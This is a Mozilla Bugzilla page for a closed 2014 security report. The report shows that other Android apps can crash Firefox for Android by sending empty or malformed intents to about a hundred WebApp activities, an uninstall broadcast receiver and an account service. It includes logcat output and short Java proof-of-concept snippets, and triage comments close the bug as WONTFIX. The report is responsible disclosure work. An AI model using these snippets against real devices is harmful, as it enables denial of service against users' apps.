Closed
Bug 1036437
Opened 10 years ago
Closed 8 years ago
Other Android apps can send malformed intents to crash Firefox
Categories
(Firefox for Android Graveyard :: Web Apps (PWAs), defect, P1)
Firefox for Android Graveyard
Web Apps (PWAs)
Tracking
(Not tracked)
RESOLVED
WONTFIX
People
(Reporter: curtisk, Unassigned)
References
Details
(Keywords: csectype-dos, sec-low, Whiteboard: [reporter-external][verif?][WebRuntime])
From: Claudiu Chelaru <claxche@gmail.com> Subject: Security Bug Bounty: 103 ways to crash Firefox for Android Message-Id: <6FCFE5B0-80F8-4D46-BF16-369834049089@gmail.com> Date: Sat, 5 Jul 2014 14:04:15 +0300 To: security@mozilla.org -----//----- Hi, During my research I’ve found some issues regarding Firefox for Android - (org.mozilla.firefox) via cross application exploitation. Upon receiving malformed data the app will crash with the following message: “Unfortunately, Firefox has stopped.” Tested on Samsung Galaxy S3 - Android 4.3 API 18. 1) Activities Firefox crashes if an Intent with no arguments is sent to any the following Activities: - org.mozilla.firefox.Webapp - org.mozilla.firefox.WebApps$WebApp0 - org.mozilla.firefox.WebApps$WebApp1 - org.mozilla.firefox.WebApps$WebApp2 - org.mozilla.firefox.WebApps$WebApp3 - org.mozilla.firefox.WebApps$WebApp4 - org.mozilla.firefox.WebApps$WebApp5 - org.mozilla.firefox.WebApps$WebApp6 - org.mozilla.firefox.WebApps$WebApp7 - org.mozilla.firefox.WebApps$WebApp8 - org.mozilla.firefox.WebApps$WebApp9 - org.mozilla.firefox.WebApps$WebApp10 - org.mozilla.firefox.WebApps$WebApp11 - org.mozilla.firefox.WebApps$WebApp12 - org.mozilla.firefox.WebApps$WebApp13 - org.mozilla.firefox.WebApps$WebApp14 - org.mozilla.firefox.WebApps$WebApp15 - org.mozilla.firefox.WebApps$WebApp16 - org.mozilla.firefox.WebApps$WebApp17 - org.mozilla.firefox.WebApps$WebApp18 - org.mozilla.firefox.WebApps$WebApp19 - org.mozilla.firefox.WebApps$WebApp20 - org.mozilla.firefox.WebApps$WebApp21 - org.mozilla.firefox.WebApps$WebApp22 - org.mozilla.firefox.WebApps$WebApp23 - org.mozilla.firefox.WebApps$WebApp24 - org.mozilla.firefox.WebApps$WebApp25 - org.mozilla.firefox.WebApps$WebApp26 - org.mozilla.firefox.WebApps$WebApp27 - org.mozilla.firefox.WebApps$WebApp28 - org.mozilla.firefox.WebApps$WebApp29 - org.mozilla.firefox.WebApps$WebApp30 - org.mozilla.firefox.WebApps$WebApp31 - org.mozilla.firefox.WebApps$WebApp32 - org.mozilla.firefox.WebApps$WebApp33 - org.mozilla.firefox.WebApps$WebApp34 - org.mozilla.firefox.WebApps$WebApp35 - org.mozilla.firefox.WebApps$WebApp36 - org.mozilla.firefox.WebApps$WebApp37 - org.mozilla.firefox.WebApps$WebApp38 - org.mozilla.firefox.WebApps$WebApp39 - org.mozilla.firefox.WebApps$WebApp40 - org.mozilla.firefox.WebApps$WebApp41 - org.mozilla.firefox.WebApps$WebApp42 - org.mozilla.firefox.WebApps$WebApp43 - org.mozilla.firefox.WebApps$WebApp44 - org.mozilla.firefox.WebApps$WebApp45 - org.mozilla.firefox.WebApps$WebApp46 - org.mozilla.firefox.WebApps$WebApp47 - org.mozilla.firefox.WebApps$WebApp48 - org.mozilla.firefox.WebApps$WebApp49 - org.mozilla.firefox.WebApps$WebApp50 - org.mozilla.firefox.WebApps$WebApp51 - org.mozilla.firefox.WebApps$WebApp52 - org.mozilla.firefox.WebApps$WebApp53 - org.mozilla.firefox.WebApps$WebApp54 - org.mozilla.firefox.WebApps$WebApp55 - org.mozilla.firefox.WebApps$WebApp56 - org.mozilla.firefox.WebApps$WebApp57 - org.mozilla.firefox.WebApps$WebApp58 - org.mozilla.firefox.WebApps$WebApp59 - org.mozilla.firefox.WebApps$WebApp60 - org.mozilla.firefox.WebApps$WebApp61 - org.mozilla.firefox.WebApps$WebApp62 - org.mozilla.firefox.WebApps$WebApp63 - org.mozilla.firefox.WebApps$WebApp64 - org.mozilla.firefox.WebApps$WebApp65 - org.mozilla.firefox.WebApps$WebApp66 - org.mozilla.firefox.WebApps$WebApp67 - org.mozilla.firefox.WebApps$WebApp68 - org.mozilla.firefox.WebApps$WebApp69 - org.mozilla.firefox.WebApps$WebApp70 - org.mozilla.firefox.WebApps$WebApp71 - org.mozilla.firefox.WebApps$WebApp72 - org.mozilla.firefox.WebApps$WebApp73 - org.mozilla.firefox.WebApps$WebApp74 - org.mozilla.firefox.WebApps$WebApp75 - org.mozilla.firefox.WebApps$WebApp76 - org.mozilla.firefox.WebApps$WebApp77 - org.mozilla.firefox.WebApps$WebApp78 - org.mozilla.firefox.WebApps$WebApp79 - org.mozilla.firefox.WebApps$WebApp80 - org.mozilla.firefox.WebApps$WebApp81 - org.mozilla.firefox.WebApps$WebApp82 - org.mozilla.firefox.WebApps$WebApp83 - org.mozilla.firefox.WebApps$WebApp84 - org.mozilla.firefox.WebApps$WebApp85 - org.mozilla.firefox.WebApps$WebApp86 - org.mozilla.firefox.WebApps$WebApp87 - org.mozilla.firefox.WebApps$WebApp88 - org.mozilla.firefox.WebApps$WebApp89 - org.mozilla.firefox.WebApps$WebApp90 - org.mozilla.firefox.WebApps$WebApp91 - org.mozilla.firefox.WebApps$WebApp92 - org.mozilla.firefox.WebApps$WebApp93 - org.mozilla.firefox.WebApps$WebApp94 - org.mozilla.firefox.WebApps$WebApp95 - org.mozilla.firefox.WebApps$WebApp96 - org.mozilla.firefox.WebApps$WebApp97 - org.mozilla.firefox.WebApps$WebApp98 - org.mozilla.firefox.WebApps$WebApp99 - The logcat log contains the following messages to confirming that the application has crashed (applicable for all WebApps Classes as well): * "FATAL EXCEPTION: main" * "E/AndroidRuntime( 3055): android.app.SuperNotCalledException: Activity {org.mozilla.firefox/org.mozilla.firefox.Webapp} did not call through to super.onCreate()" * "I/ActivityManager( 353): Process org.mozilla.firefox:org.mozilla.firefox.Webapp (pid 3055) has died." - Proof of Concept (applicable for all WebApps Classes as well): Intent intent = new Intent(); intent.setComponent(new ComponentName("org.mozilla.firefox", "org.mozilla.firefox.Webapp")); startActivity(intent); 2) Broadcast Receivers Firefox crashes if an Intent is broadcasted to "org.mozilla.gecko.webapp.UninstallListener" with no arguments. - The logcat log contains the following messages to confirming that the application has crashed: * "E/AndroidRuntime( 3071): FATAL EXCEPTION: main" * "E/AndroidRuntime( 3071): java.lang.RuntimeException: Unable to start receiver org.mozilla.gecko.webapp.UninstallListener: java.lang.NullPointerException" - Proof of Concept: Intent intent = new Intent(); intent.setComponent(new ComponentName("org.mozilla.firefox", "org.mozilla.gecko.webapp.UninstallListener")); sendBroadcast(intent); 3) Services Firefox crashes if a random message is sent to "org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService". - The logcat log contains the following messages to confirming that the application has crashed: * "E/AndroidRuntime( 3217): FATAL EXCEPTION: main" * "E/AndroidRuntime( 3217): java.lang.RuntimeException: Unable to bind to service org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService@5274670c with Intent { cmp=org.mozilla.firefox/org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService }: java.lang.NullPointerException" - Proof of Concept: Intent service = new Intent(); service.setComponent(new ComponentName("org.mozilla.firefox", "org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService")); v.getContext().bindService(service, new ServiceConnection() { @Override public void onServiceConnected(ComponentName name, IBinder service) { Messenger messenger = new Messenger(service); try { messenger.send(Message.obtain(null, 1, 2, 3)); } catch (RemoteException e) { } } } , Context.BIND_AUTO_CREATE); Kind Regards, Claudiu Chelaru
Reporter | ||
Comment 1•10 years ago
|
||
assigned to mgoodwin for verification
Assignee: nobody → mgoodwin
Flags: sec-bounty?
Whiteboard: [reporter-external][verif?]
Reporter | ||
Updated•10 years ago
|
Summary: crashes Intents → crashes in intents
Updated•10 years ago
|
Component: General → Web Apps
QA Contact: aaron.train
Comment 2•10 years ago
|
||
Going to break point 3 into a separate bug.
Updated•10 years ago
|
Priority: -- → P1
Whiteboard: [reporter-external][verif?] → [reporter-external][verif?][WebRuntime]
Updated•10 years ago
|
Assignee: mgoodwin → nobody
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: sec-bounty? → sec-bounty-
Keywords: csectype-dos
Summary: crashes in intents → Other Android apps can send malformed intents to crash Firefox
Updated•9 years ago
|
Group: core-security → firefox-core-security
Comment 5•8 years ago
|
||
Per bug 1235869, we're going to disable the Android web runtime, so we won't fix this bug in it. (This is part of a bulk resolution of bugs in the Firefox for Android::Web Apps component, from which I attempted to exclude bugs that are not specific to the runtime, but it's possible that I included one accidentally. If so, I'm sorry, and please reopen the bug!)
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → WONTFIX
Updated•7 years ago
|
Group: firefox-core-security
Updated•3 years ago
|
Product: Firefox for Android → Firefox for Android Graveyard
You need to log in
before you can comment on or make changes to this bug.
Description
•